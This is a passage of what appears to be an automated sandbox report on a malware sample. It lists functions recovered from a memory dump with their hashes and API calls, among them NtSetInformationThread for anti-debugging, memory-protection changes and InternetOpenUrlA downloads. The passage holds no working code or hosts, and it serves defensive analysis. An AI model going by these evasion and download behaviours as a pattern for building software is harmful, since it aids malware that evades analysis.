Opcode Fuzzy Hash: 6d54a0856f20cf99d903472e2fcdbee84954223481e5c82593ff812831941a00
Instruction Fuzzy Hash: 2141E134608241DFDF354A68C46A3F02F627F62318FE94D5BC8434716AD36684CAEB53

Uniqueness

Uniqueness Score: -1.00%

Function 005661CE, Relevance: 1.6, APIs: 1, Instructions: 125nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 0af72ac4b638492d4992bf3aea6b7d117b9279a3a816a37c24d2e8c9b1c21e35
Instruction ID: a70e2dc405c6b76105c646db0826b65c7fcbb90675328d48c63a494bcf1a9a7e
Opcode Fuzzy Hash: 0af72ac4b638492d4992bf3aea6b7d117b9279a3a816a37c24d2e8c9b1c21e35
Instruction Fuzzy Hash: 0D41AD34608141DFDF354A68C4AA3F12F62BF62319FE94D1BC84347159D36684CAEB53

Uniqueness

Uniqueness Score: -1.00%

Function 005661FE, Relevance: 1.6, APIs: 1, Instructions: 120nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: a9d197337c6b2e363f0581d3844d9f62cde238c7b1ef72eb57ab282c5e749c4f
Instruction ID: a999a5fce39df87ffb5ceb549ac8a0f0b3aa02f94d02a1ad646279ae271daad7
Opcode Fuzzy Hash: a9d197337c6b2e363f0581d3844d9f62cde238c7b1ef72eb57ab282c5e749c4f
Instruction Fuzzy Hash: 2731DF34608101DFDF354A68C4AE3F12F627F62319FE94D1AC84347165D76684C9EB53

Uniqueness

Uniqueness Score: -1.00%

Function 0056648A, Relevance: 1.6, APIs: 1, Instructions: 111nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: f8d7a3f32b6fcd7f357dc007a48b1339fc4a2109ff9e2688f5cadfd4587c0f04
Instruction ID: 12c65bcde876d803917c8860bc2839d8a6bb6e2ed1774826659a43a468346e2d
Opcode Fuzzy Hash: f8d7a3f32b6fcd7f357dc007a48b1339fc4a2109ff9e2688f5cadfd4587c0f04
Instruction Fuzzy Hash: 6E41DE11608BD25BCB238B3884987916FA23D97729B9D07CC8CE25B1F2CB13C182C382

Uniqueness

Uniqueness Score: -1.00%

Function 0056624A, Relevance: 1.6, APIs: 1, Instructions: 111nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: a517e83ff9d72b22b9a3f200dde12bc3c0e9ad6b2e7049abb1ec12b08369398d
Instruction ID: 4c6e11845aca9a66343abfbb57963468d937460cb148ed458e5edddad222052e
Opcode Fuzzy Hash: a517e83ff9d72b22b9a3f200dde12bc3c0e9ad6b2e7049abb1ec12b08369398d
Instruction Fuzzy Hash: 8E31E134608141DFDF354A68C46E3F12F627F62319FE94D5AC883471A9C36684CAEB53

Uniqueness

Uniqueness Score: -1.00%

Function 00566264, Relevance: 1.6, APIs: 1, Instructions: 107nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 7ca7c722efa27e779ee59994931695ab0d2df8a7f67dd21fa1462bf4dfdf7373
Instruction ID: f6b86287a1e8166f6caa210da69c991c7ed715ca0dec06fc14b8bff538a3dfdc
Opcode Fuzzy Hash: 7ca7c722efa27e779ee59994931695ab0d2df8a7f67dd21fa1462bf4dfdf7373
Instruction Fuzzy Hash: 3931EF34608141DFDF394A68C46E3F02F627F62319FE94E5AC843471A9C3A688C9EB53

Uniqueness

Uniqueness Score: -1.00%

Function 005662F0, Relevance: 1.6, APIs: 1, Instructions: 102nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 7c8e882d600577151be6c403f6d6822a1e843473fd9dc9b1b94efc47b2b13ca7
Instruction ID: 7aedd94365c442453e7301d2a8ca323a9580999f0ec99df133b8f4d6d02326e4
Opcode Fuzzy Hash: 7c8e882d600577151be6c403f6d6822a1e843473fd9dc9b1b94efc47b2b13ca7
Instruction Fuzzy Hash: AE31C434608285DFDF254B68C46E7F02F917F22319FE94E9AC8434B1A6C7A684C9DB53

Uniqueness

Uniqueness Score: -1.00%

Function 00566296, Relevance: 1.6, APIs: 1, Instructions: 101nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 55f49bacf0c38e012b45d75a2a790dfca71eded09cb979cf592c83170be1c430
Instruction ID: 7029047ec75c895890e80d4d304a3c44ecd72c1dbaaeb8128b72c0bba2711867
Opcode Fuzzy Hash: 55f49bacf0c38e012b45d75a2a790dfca71eded09cb979cf592c83170be1c430
Instruction Fuzzy Hash: AC31BF30608645DFDF394A68C45E3F02F627F21319FE94E5AC843471A5D7A684C9EB93

Uniqueness

Uniqueness Score: -1.00%

Function 005662B4, Relevance: 1.6, APIs: 1, Instructions: 96nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 7785c6947548d7e276853caced4fc6164fb38ecd5615384761beccd2df660e46
Instruction ID: 6a75fd262b46d53daa6163285f66ea47cd023030adeaeddeb9ae3f6a6d13482f
Opcode Fuzzy Hash: 7785c6947548d7e276853caced4fc6164fb38ecd5615384761beccd2df660e46
Instruction Fuzzy Hash: 8631C130608245DFDF254A68C45E3B02F61BF21319FE94E5AC843471A9D7A684C9EB57

Uniqueness

Uniqueness Score: -1.00%

Function 005662CA, Relevance: 1.6, APIs: 1, Instructions: 94nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 76a7a764c612f1e8748310eb2c75c6acbae3be37838f136074f2c32656b102d1
Instruction ID: 95b502f0e50f52bdbdff6301e38d1d606cd6705174d51ea021f09d4c6453775e
Opcode Fuzzy Hash: 76a7a764c612f1e8748310eb2c75c6acbae3be37838f136074f2c32656b102d1
Instruction Fuzzy Hash: 6331A030608245DFDF294A68C45E3F02F617F21329FE94E5BC843471A9C7A684C9EB53

Uniqueness

Uniqueness Score: -1.00%

Function 0056633C, Relevance: 1.6, APIs: 1, Instructions: 94nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 024fdeb9d9b4d388333f064b761403d0b16aea4eaf1fc8e45e618788829ce317
Instruction ID: ffba7f0ab22e870708622b4e684ed0784b3a53e2269d64c81e722465c2834157
Opcode Fuzzy Hash: 024fdeb9d9b4d388333f064b761403d0b16aea4eaf1fc8e45e618788829ce317
Instruction Fuzzy Hash: 9231E530608245DFDF254A78C45E3B03F917F62329FE94E4AC893471A5C7A684CADB53

Uniqueness

Uniqueness Score: -1.00%

Function 005663E0, Relevance: 1.6, APIs: 1, Instructions: 93nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 8f3f5511c6fd381222d774be3f99a76b2f593942c247a0900bf380820bf78a0e
Instruction ID: b2e3b053e9e9392a157d279fffe259c17a3ff64ece35d3a1fd6e5f8c7812230f
Opcode Fuzzy Hash: 8f3f5511c6fd381222d774be3f99a76b2f593942c247a0900bf380820bf78a0e
Instruction Fuzzy Hash: C331E230608286DFDF264A78C45D3B07FA17F62329FE94B86C892471A6C36684C9DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00566306, Relevance: 1.6, APIs: 1, Instructions: 87nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: c8afc1da492e6e71872e53689ef65665006a8275c358dde0d78d519e11f88519
Instruction ID: caf50cdcb1f07930b625e549bfe3dea2f16e2de25e3b4cc01deae0ca2c30f54a
Opcode Fuzzy Hash: c8afc1da492e6e71872e53689ef65665006a8275c358dde0d78d519e11f88519
Instruction Fuzzy Hash: 15218E30608245DFDF294A68C49E3B02F627F61329FE94E5AC84347169C7A684C9EA53

Uniqueness

Uniqueness Score: -1.00%

Function 00566324, Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 11d2ab8649e333107add6fcdfa4b16f9600215272481736b6f6dba479aa404e1
Instruction ID: af99e93784fd5cf8cb7db34c217ed23a5f6d4e08628f81b54b6706489c1e770c
Opcode Fuzzy Hash: 11d2ab8649e333107add6fcdfa4b16f9600215272481736b6f6dba479aa404e1
Instruction Fuzzy Hash: CA21CC30608245DFDF298A68C09E3B02F627F61329FE94E4AC84347169C7B684C9EB53

Uniqueness

Uniqueness Score: -1.00%

Function 0056635A, Relevance: 1.6, APIs: 1, Instructions: 75nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 411a12480e9917f464a15f2de9bdf185ddb2bf4e4d5d04bcc97a992ee18d684f
Instruction ID: cade65434dc3770b47a4b9a5f0bef39c022ca0e4816b3f85bcde451b8013b56d
Opcode Fuzzy Hash: 411a12480e9917f464a15f2de9bdf185ddb2bf4e4d5d04bcc97a992ee18d684f
Instruction Fuzzy Hash: FA21F330A08245DFDF344A68C05E3B43F627F71329FE94A46C84347069C76684C9DB53

Uniqueness

Uniqueness Score: -1.00%

Function 0056636E, Relevance: 1.6, APIs: 1, Instructions: 74nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 8a64882613528bd309e227637e5af82a99d08b6e190cf0107fec394d64fad8ee
Instruction ID: 0ebfc7802a1221f34f1712dcf8fae556ec57e65f26569f69f4ead6b4ca686a29
Opcode Fuzzy Hash: 8a64882613528bd309e227637e5af82a99d08b6e190cf0107fec394d64fad8ee
Instruction Fuzzy Hash: 2021CD30A04245DFDF394A68C49E3B03F627F61329FE98A5AC84347069C7A684C9DB53

Uniqueness

Uniqueness Score: -1.00%

Function 0056638E, Relevance: 1.6, APIs: 1, Instructions: 70nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: c9a00a3d816ac38792cf6e5e89f1afb728cbb764a9f2006af7d37bc05e9ff784
Instruction ID: e75d1dbd5ec9f7324dcc908ba8be4c6faf58bf92677861be039b90084b8bc04b
Opcode Fuzzy Hash: c9a00a3d816ac38792cf6e5e89f1afb728cbb764a9f2006af7d37bc05e9ff784
Instruction Fuzzy Hash: 2B218130A09245DFDF354A28C09E3B02FA27F71319FD9995AC88347069C7A685C9DB57

Uniqueness

Uniqueness Score: -1.00%

Function 005663AE, Relevance: 1.6, APIs: 1, Instructions: 65nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 97300b2cb3a2753af14c2aa121fece2307cf80730ab48135df4e9e8e759d074b
Instruction ID: e769e587d312fdd4f627f3d3d7d19361ec6a5095d3cb580c8bec5abde04e51eb
Opcode Fuzzy Hash: 97300b2cb3a2753af14c2aa121fece2307cf80730ab48135df4e9e8e759d074b
Instruction Fuzzy Hash: CC116D30A15245DFDF298A28C09E3B02FA27F61319FD9895AC84347069C7A685C9DA53

Uniqueness

Uniqueness Score: -1.00%

Function 005663C8, Relevance: 1.6, APIs: 1, Instructions: 63nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 38c3f2b012ad2a7684713905881e89b110b3011a1803d7877d713a5a6b505bc3
Instruction ID: efcb3d1b16c96a20cf7ac9d45fdc6f479aac13601efc67223812d9f022d64777
Opcode Fuzzy Hash: 38c3f2b012ad2a7684713905881e89b110b3011a1803d7877d713a5a6b505bc3
Instruction Fuzzy Hash: 99119130A15245DFDF398A28C09E3B02FA27F71319FD9895AC84347069C7B685C9DB57

Uniqueness

Uniqueness Score: -1.00%

Function 005606D4, Relevance: 1.6, APIs: 1, Instructions: 56nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,00000000,00000000,00000000,00000000), ref: 0056068F

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 3a375d8aae3dfc25dcde08453cfa889a4f4ad44889f65c719d56850d968e2e53
Instruction ID: 9c294423050fd6caca6a9b2c62cc3d93085252aa2b858c664befb1ac7bac0844
Opcode Fuzzy Hash: 3a375d8aae3dfc25dcde08453cfa889a4f4ad44889f65c719d56850d968e2e53
Instruction Fuzzy Hash: E71189A010479EABEF129F348CA57DB3F95BF863A8F540759ECA21B1D2CB61C841C691

Uniqueness

Uniqueness Score: -1.00%

Function 00566474, Relevance: 1.6, APIs: 1, Instructions: 53nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 7f5b0d8beb4ebc53e1e91f0a738307b3e2fe7d3400ad41f50ea48b0787ac4c3b
Instruction ID: 2a4398fdab3b67e8ccfc6555283ea4d38edfe4c8471f0f9f15851d93aecc8341
Opcode Fuzzy Hash: 7f5b0d8beb4ebc53e1e91f0a738307b3e2fe7d3400ad41f50ea48b0787ac4c3b
Instruction Fuzzy Hash: F9118230618686CEDF254A78C0597B02F627F62329FDD4B86C8934B0B9C762C4C9D652

Uniqueness

Uniqueness Score: -1.00%

Function 0056640C, Relevance: 1.6, APIs: 1, Instructions: 53nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 84fd4bd7686b5c4d04771b5f05d3e77361a886e70ad8c0e66044a079ffcc0ef2
Instruction ID: e2d560f81afb425f250ca2afe83e837d133b11825c1db529a895d07d774c7f8e
Opcode Fuzzy Hash: 84fd4bd7686b5c4d04771b5f05d3e77361a886e70ad8c0e66044a079ffcc0ef2
Instruction Fuzzy Hash: 17018030A15245CFDF299E28C05E3B02F627F71319FD94A4AC8434B029D766C5C9D757

Uniqueness

Uniqueness Score: -1.00%

Function 0056642A, Relevance: 1.6, APIs: 1, Instructions: 50nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: d50519225e8e1bdda75b89b1fec0f95cd57801ed6709a37a0902367886b5004a
Instruction ID: 61ebdc88f738b1853938984926d8b1018e9579e4c65897736cc9dd6a5555c088
Opcode Fuzzy Hash: d50519225e8e1bdda75b89b1fec0f95cd57801ed6709a37a0902367886b5004a
Instruction Fuzzy Hash: CF01BC30A05245CFEF299E38C09E3B02F627FB1719FD94A4AC88347029C76285C9D653

Uniqueness

Uniqueness Score: -1.00%

Function 0056645C, Relevance: 1.5, APIs: 1, Instructions: 43nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 4df4eeb8ed6f438bcd0c649cb1c2fb3d2e41c8e40e520075ff2e7765346f010c
Instruction ID: e2a46f13e924938000bb7e931d9a7af22673ddf3dcaf1c73c40be582b424dd7d
Opcode Fuzzy Hash: 4df4eeb8ed6f438bcd0c649cb1c2fb3d2e41c8e40e520075ff2e7765346f010c
Instruction Fuzzy Hash: 7DF0C8347081459FDF2A5E34C05A3F51F637EA67047D94A4AC85347039D6138589D752

Uniqueness

Uniqueness Score: -1.00%

Function 005638AC, Relevance: 1.5, APIs: 1, Instructions: 29libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00561557,?,00000000,?,0000006C,00000333,?,00563AC1,?,?), ref: 00563896

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 21f4805a47c95dfacb7a42b8e5ad1fdf9f5941a4a5c977bedd977b5825684709
Instruction ID: ead1cb5e490d3a7ff07c26f09eadeac9b6ecbfada31c940027e49965192515a9
Opcode Fuzzy Hash: 21f4805a47c95dfacb7a42b8e5ad1fdf9f5941a4a5c977bedd977b5825684709
Instruction Fuzzy Hash: EEF0E9220597C65AC713EB78094DB82BF616E83320B5CC7DD8CE0075F386129296D7C5

Uniqueness

Uniqueness Score: -1.00%

Function 005664D8, Relevance: 1.5, APIs: 1, Instructions: 27nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 7536693be9a967889e91395a361ee4bd48dc202e3f76bef884484bf2c7659d88
Instruction ID: 794ab4ff6b5acc7be807e03195fae7824ecc21c6899b50af826c98a6d45042de
Opcode Fuzzy Hash: 7536693be9a967889e91395a361ee4bd48dc202e3f76bef884484bf2c7659d88
Instruction Fuzzy Hash: 26F065746085868BDB2A9B38C52A2B42F667EA2704BDC4788C9934B579D6229485C301

Uniqueness

Uniqueness Score: -1.00%

Function 005664FA, Relevance: 1.5, APIs: 1, Instructions: 22nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: d1b0387f5b1c13842347f98529f02d029e976155f9174f120fb1e3f72884e5c2
Instruction ID: a8ea4ded0972d5c9903864253e3b30a471a40e06a6795fbb26194c3ddb6d79b6
Opcode Fuzzy Hash: d1b0387f5b1c13842347f98529f02d029e976155f9174f120fb1e3f72884e5c2
Instruction Fuzzy Hash: C3E0263490838087DB26EF30C0D62ED6EA33CE0A04FE4496DC4C383429C623D045C746

Uniqueness

Uniqueness Score: -1.00%

Function 00565CCB, Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00565906,00000040,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00565CFA

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: effbcb10055bc642fc2bf50ab40000bbfacae18897324aac2a014b70f7fc03f0
Instruction ID: c84f3710d1710dc3da1377eb50a1ebcf2e04f8b30a2a48e068c5c71d9c4bcff7
Opcode Fuzzy Hash: effbcb10055bc642fc2bf50ab40000bbfacae18897324aac2a014b70f7fc03f0
Instruction Fuzzy Hash: 81E027954145407755038B3C4C1896777676ED5B18B41C35CE473312F9CB33C501C2F5

Uniqueness

Uniqueness Score: -1.00%

Function 00565CE1, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00565906,00000040,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00565CFA

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

Uniqueness

Uniqueness Score: -1.00%

Function 00561EEC, Relevance: 1.3, APIs: 1, Instructions: 83sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_000065AA,00000000,00000000,00000000), ref: 00561FE2

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d643a6584e2b8d1518f439ad15c39996fa2cd106388c25e321609640f9a4994b
Instruction ID: 66fb2d42de75a7808475a6f312e6ba1756a4e633e8c8e86ef71b830fc9be7a91
Opcode Fuzzy Hash: d643a6584e2b8d1518f439ad15c39996fa2cd106388c25e321609640f9a4994b
Instruction Fuzzy Hash: 27214870240B01AFE325AF24CC5AFF56FA2BF54B10F54441CE9464F1F2D366C881CA26

Uniqueness

Uniqueness Score: -1.00%

Function 00561F14, Relevance: 1.3, APIs: 1, Instructions: 78sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_000065AA,00000000,00000000,00000000), ref: 00561FE2

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c453dc27180114e024efc6af22a518caa3f7639e8e85a51941c2ff920709b94f
Instruction ID: 5c4b674b8c0f1447ed46e35658dffdda80d49a47e32448b6e233c26f476d7cbc
Opcode Fuzzy Hash: c453dc27180114e024efc6af22a518caa3f7639e8e85a51941c2ff920709b94f
Instruction Fuzzy Hash: 9821D330284B82AFE3259F24CD6AFE67FA1BF55B50F188448E9855B1F2D3A5D880C716

Uniqueness

Uniqueness Score: -1.00%

Function 005640AC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,000000D0,00000200,005613FB,?,?,?,?,00563B09), ref: 005640D2

Strings

\, xrefs: 005640C2

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LongNamePath
String ID: \
API String ID: 82841172-2967466578
Opcode ID: bbbac88ff80599b3a53f3770bd0dbfda3b4a6dcad758c4ffd8d73a9bca7969b0
Instruction ID: d36d9dfda2f003b878e21c9a47c4ef9bb15fd5b8d577faee37b169d94ea76c53
Opcode Fuzzy Hash: bbbac88ff80599b3a53f3770bd0dbfda3b4a6dcad758c4ffd8d73a9bca7969b0
Instruction Fuzzy Hash: 56E07201808784A3E393A734080CBC6AEAA3FE1B00F50488CE0C36F0A3CBB3C041CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0056322B, Relevance: 3.1, APIs: 2, Instructions: 118networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(0056381A,00000000,00000000,00000000,00000000,00561557,?,00000000,?,0000006C,00000333,?,00563AC1,?,?), ref: 00563259
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563300

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: ac44bb75fe274c61f94d2d323627a7de3f30383624d6f81d770fd06a0385df8c
Instruction ID: a5db798641ffa28202962243100bf1bd30a4cec2271317f8a0d4eb5ce352e4e5
Opcode Fuzzy Hash: ac44bb75fe274c61f94d2d323627a7de3f30383624d6f81d770fd06a0385df8c
Instruction Fuzzy Hash: F741A274344387ABEF314F10CD99BFE3A65BF41740F108928ED0AAB181EB728A84E610

Uniqueness

Uniqueness Score: -1.00%

Function 00563214, Relevance: 3.1, APIs: 2, Instructions: 106networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(0056381A,00000000,00000000,00000000,00000000,00561557,?,00000000,?,0000006C,00000333,?,00563AC1,?,?), ref: 00563259
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563300

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: acf8e0141b8ddaa4c8e7f1fa4d8c82a77aa62e85d06a2d24b06f8ec85ef4c958
Instruction ID: c17a9a9d662add48118fd24551f33da9fe65dafb517aedc628e720a746817480
Opcode Fuzzy Hash: acf8e0141b8ddaa4c8e7f1fa4d8c82a77aa62e85d06a2d24b06f8ec85ef4c958
Instruction Fuzzy Hash: FD31E470344347ABEB314F24CD99BFE3AA5BF41740F108928ED4AEB591EB72DA44E614

Uniqueness

Uniqueness Score: -1.00%

Function 00563244, Relevance: 3.1, APIs: 2, Instructions: 93networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(0056381A,00000000,00000000,00000000,00000000,00561557,?,00000000,?,0000006C,00000333,?,00563AC1,?,?), ref: 00563259
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563300

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
